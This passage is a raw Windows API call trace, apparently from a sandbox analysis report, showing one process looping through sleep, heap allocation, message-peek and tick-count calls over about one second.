SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.314] GetLastError () returned 0x0 [0065.315] GetCurrentProcessId () returned 0xa44 [0065.315] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.315] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.315] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.315] GetTickCount () returned 0x1cdd9 [0065.315] GetTickCount () returned 0x1cdd9 [0065.315] GetTickCount () returned 0x1cdd9 [0065.315] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.315] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.315] GetTickCount () returned 0x1cdd9 [0065.315] Sleep (dwMilliseconds=0x0) [0065.346] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.361] GetLastError () returned 0x0 [0065.361] GetCurrentProcessId () returned 0xa44 [0065.361] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.361] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.361] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.361] GetTickCount () returned 0x1ce07 [0065.361] GetTickCount () returned 0x1ce07 [0065.362] GetTickCount () returned 0x1ce07 [0065.362] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.362] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.362] GetTickCount () returned 0x1ce07 [0065.362] Sleep (dwMilliseconds=0x0) [0065.377] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.408] GetLastError () returned 0x0 [0065.408] GetCurrentProcessId () returned 0xa44 [0065.408] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.408] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.408] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.408] GetTickCount () returned 0x1ce36 [0065.408] GetTickCount () returned 0x1ce36 [0065.409] GetTickCount () returned 0x1ce36 [0065.409] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.409] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.409] GetTickCount () returned 0x1ce36 [0065.409] Sleep (dwMilliseconds=0x0) [0065.424] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.439] GetLastError () returned 0x0 [0065.439] GetCurrentProcessId () returned 0xa44 [0065.439] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.439] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.439] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.439] GetTickCount () returned 0x1ce55 [0065.439] GetTickCount () returned 0x1ce55 [0065.439] GetTickCount () returned 0x1ce55 [0065.439] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.440] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.440] GetTickCount () returned 0x1ce55 [0065.440] Sleep (dwMilliseconds=0x0) [0065.455] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.470] GetLastError () returned 0x0 [0065.470] GetCurrentProcessId () returned 0xa44 [0065.470] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.471] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.471] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.471] GetTickCount () returned 0x1ce75 [0065.471] GetTickCount () returned 0x1ce75 [0065.471] GetTickCount () returned 0x1ce75 [0065.471] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.471] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.471] GetTickCount () returned 0x1ce75 [0065.471] Sleep (dwMilliseconds=0x0) [0065.486] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.502] GetLastError () returned 0x0 [0065.502] GetCurrentProcessId () returned 0xa44 [0065.502] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.502] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.502] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.502] GetTickCount () returned 0x1ce94 [0065.502] GetTickCount () returned 0x1ce94 [0065.502] GetTickCount () returned 0x1ce94 [0065.502] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.502] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.502] GetTickCount () returned 0x1ce94 [0065.502] Sleep (dwMilliseconds=0x0) [0065.533] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.549] GetLastError () returned 0x0 [0065.549] GetCurrentProcessId () returned 0xa44 [0065.549] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.549] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.549] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.549] GetTickCount () returned 0x1cec3 [0065.549] GetTickCount () returned 0x1cec3 [0065.549] GetTickCount () returned 0x1cec3 [0065.549] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.549] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.549] GetTickCount () returned 0x1cec3 [0065.549] Sleep (dwMilliseconds=0x0) [0065.564] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.580] GetLastError () returned 0x0 [0065.580] GetCurrentProcessId () returned 0xa44 [0065.580] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.580] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.580] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.580] GetTickCount () returned 0x1cee2 [0065.580] GetTickCount () returned 0x1cee2 [0065.580] GetTickCount () returned 0x1cee2 [0065.580] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.580] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.580] GetTickCount () returned 0x1cee2 [0065.580] Sleep (dwMilliseconds=0x0) [0065.595] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.611] GetLastError () returned 0x0 [0065.611] GetCurrentProcessId () returned 0xa44 [0065.611] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.611] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.611] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.611] GetTickCount () returned 0x1cf01 [0065.611] GetTickCount () returned 0x1cf01 [0065.611] GetTickCount () returned 0x1cf01 [0065.611] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.611] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.611] GetTickCount () returned 0x1cf01 [0065.611] Sleep (dwMilliseconds=0x0) [0065.626] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.642] GetLastError () returned 0x0 [0065.642] GetCurrentProcessId () returned 0xa44 [0065.642] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.642] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.642] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.642] GetTickCount () returned 0x1cf20 [0065.642] GetTickCount () returned 0x1cf20 [0065.642] GetTickCount () returned 0x1cf20 [0065.643] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.643] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.643] GetTickCount () returned 0x1cf20 [0065.643] Sleep (dwMilliseconds=0x0) [0065.659] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.673] GetLastError () returned 0x0 [0065.673] GetCurrentProcessId () returned 0xa44 [0065.673] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.673] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.673] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.673] GetTickCount () returned 0x1cf3f [0065.673] GetTickCount () returned 0x1cf3f [0065.674] GetTickCount () returned 0x1cf3f [0065.674] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.674] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.674] GetTickCount () returned 0x1cf3f [0065.674] Sleep (dwMilliseconds=0x0) [0065.689] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.720] GetLastError () returned 0x0 [0065.720] GetCurrentProcessId () returned 0xa44 [0065.720] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.720] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.720] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.720] GetTickCount () returned 0x1cf6e [0065.720] GetTickCount () returned 0x1cf6e [0065.721] GetTickCount () returned 0x1cf6e [0065.721] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.721] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.721] GetTickCount () returned 0x1cf6e [0065.721] Sleep (dwMilliseconds=0x0) [0065.721] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.736] GetLastError () returned 0x0 [0065.736] GetCurrentProcessId () returned 0xa44 [0065.736] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.736] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.736] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.736] GetTickCount () returned 0x1cf7e [0065.736] GetTickCount () returned 0x1cf7e [0065.736] GetTickCount () returned 0x1cf7e [0065.736] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.736] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.736] GetTickCount () returned 0x1cf7e [0065.736] Sleep (dwMilliseconds=0x0) [0065.751] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.782] GetLastError () returned 0x0 [0065.783] GetCurrentProcessId () returned 0xa44 [0065.783] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.783] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.783] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.783] GetTickCount () returned 0x1cfad [0065.783] GetTickCount () returned 0x1cfad [0065.783] GetTickCount () returned 0x1cfad [0065.783] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.783] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.783] GetTickCount () returned 0x1cfad [0065.783] Sleep (dwMilliseconds=0x0) [0065.799] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.814] GetLastError () returned 0x0 [0065.814] GetCurrentProcessId () returned 0xa44 [0065.814] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.814] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.814] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.814] GetTickCount () returned 0x1cfcc [0065.814] GetTickCount () returned 0x1cfcc [0065.814] GetTickCount () returned 0x1cfcc [0065.814] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.814] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.814] GetTickCount () returned 0x1cfcc [0065.814] Sleep (dwMilliseconds=0x0) [0065.829] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.845] GetLastError () returned 0x0 [0065.845] GetCurrentProcessId () returned 0xa44 [0065.845] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.845] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.845] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.845] GetTickCount () returned 0x1cfeb [0065.845] GetTickCount () returned 0x1cfeb [0065.845] GetTickCount () returned 0x1cfeb [0065.845] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.845] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.845] GetTickCount () returned 0x1cfeb [0065.845] Sleep (dwMilliseconds=0x0) [0065.861] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.876] GetLastError () returned 0x0 [0065.876] GetCurrentProcessId () returned 0xa44 [0065.876] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.876] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.876] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.876] GetTickCount () returned 0x1d00a [0065.876] GetTickCount () returned 0x1d00a [0065.876] GetTickCount () returned 0x1d00a [0065.877] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.877] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.877] GetTickCount () returned 0x1d00a [0065.877] Sleep (dwMilliseconds=0x0) [0065.907] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.923] GetLastError () returned 0x0 [0065.923] GetCurrentProcessId () returned 0xa44 [0065.923] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.923] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.923] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.923] GetTickCount () returned 0x1d039 [0065.923] GetTickCount () returned 0x1d039 [0065.923] GetTickCount () returned 0x1d039 [0065.923] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.923] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.923] GetTickCount () returned 0x1d039 [0065.923] Sleep (dwMilliseconds=0x0) [0065.938] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.954] GetLastError () returned 0x0 [0065.954] GetCurrentProcessId () returned 0xa44 [0065.954] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.954] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.954] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.954] GetTickCount () returned 0x1d058 [0065.954] GetTickCount () returned 0x1d058 [0065.954] GetTickCount () returned 0x1d058 [0065.954] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.954] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.954] GetTickCount () returned 0x1d058 [0065.955] Sleep (dwMilliseconds=0x0) [0065.970] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0065.985] GetLastError () returned 0x0 [0065.985] GetCurrentProcessId () returned 0xa44 [0065.985] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0065.985] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0065.985] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0065.985] GetTickCount () returned 0x1d077 [0065.985] GetTickCount () returned 0x1d077 [0065.986] GetTickCount () returned 0x1d077 [0065.986] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0065.986] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0065.986] GetTickCount () returned 0x1d077 [0065.986] Sleep (dwMilliseconds=0x0) [0065.986] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.005] GetLastError () returned 0x0 [0066.005] GetCurrentProcessId () returned 0xa44 [0066.005] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.005] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.006] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.006] GetTickCount () returned 0x1d087 [0066.006] GetTickCount () returned 0x1d087 [0066.006] GetTickCount () returned 0x1d087 [0066.006] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.006] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.006] GetTickCount () returned 0x1d087 [0066.006] Sleep (dwMilliseconds=0x0) [0066.032] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.049] GetLastError () returned 0x0 [0066.049] GetCurrentProcessId () returned 0xa44 [0066.049] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.049] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.049] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.049] GetTickCount () returned 0x1d0b6 [0066.049] GetTickCount () returned 0x1d0b6 [0066.049] GetTickCount () returned 0x1d0b6 [0066.049] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.050] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.050] GetTickCount () returned 0x1d0b6 [0066.050] Sleep (dwMilliseconds=0x0) [0066.050] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.063] GetLastError () returned 0x0 [0066.063] GetCurrentProcessId () returned 0xa44 [0066.063] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.063] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.063] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.063] GetTickCount () returned 0x1d0c5 [0066.064] GetTickCount () returned 0x1d0c5 [0066.064] GetTickCount () returned 0x1d0c5 [0066.064] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.064] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.064] GetTickCount () returned 0x1d0c5 [0066.064] Sleep (dwMilliseconds=0x0) [0066.084] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.085] GetLastError () returned 0x0 [0066.085] GetCurrentProcessId () returned 0xa44 [0066.085] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.085] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.085] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.085] GetTickCount () returned 0x1d0d5 [0066.085] GetTickCount () returned 0x1d0d5 [0066.085] GetTickCount () returned 0x1d0d5 [0066.085] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.085] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.085] GetTickCount () returned 0x1d0d5 [0066.085] Sleep (dwMilliseconds=0x0) [0066.085] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.095] GetLastError () returned 0x0 [0066.095] GetCurrentProcessId () returned 0xa44 [0066.096] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.096] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.096] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.096] GetTickCount () returned 0x1d0e5 [0066.096] GetTickCount () returned 0x1d0e5 [0066.096] GetTickCount () returned 0x1d0e5 [0066.096] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.096] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.096] GetTickCount () returned 0x1d0e5 [0066.096] Sleep (dwMilliseconds=0x0) [0066.110] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.126] GetLastError () returned 0x0 [0066.126] GetCurrentProcessId () returned 0xa44 [0066.126] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.126] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.126] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.126] GetTickCount () returned 0x1d104 [0066.126] GetTickCount () returned 0x1d104 [0066.126] GetTickCount () returned 0x1d104 [0066.126] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.126] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.126] GetTickCount () returned 0x1d104 [0066.126] Sleep (dwMilliseconds=0x0) [0066.141] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.157] GetLastError () returned 0x0 [0066.157] GetCurrentProcessId () returned 0xa44 [0066.157] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.157] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.157] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.157] GetTickCount () returned 0x1d123 [0066.157] GetTickCount () returned 0x1d123 [0066.157] GetTickCount () returned 0x1d123 [0066.157] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.157] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.157] GetTickCount () returned 0x1d123 [0066.157] Sleep (dwMilliseconds=0x0) [0066.172] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.197] GetLastError () returned 0x0 [0066.197] GetCurrentProcessId () returned 0xa44 [0066.197] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.197] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.197] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.197] GetTickCount () returned 0x1d142 [0066.197] GetTickCount () returned 0x1d142 [0066.197] GetTickCount () returned 0x1d142 [0066.197] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.197] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 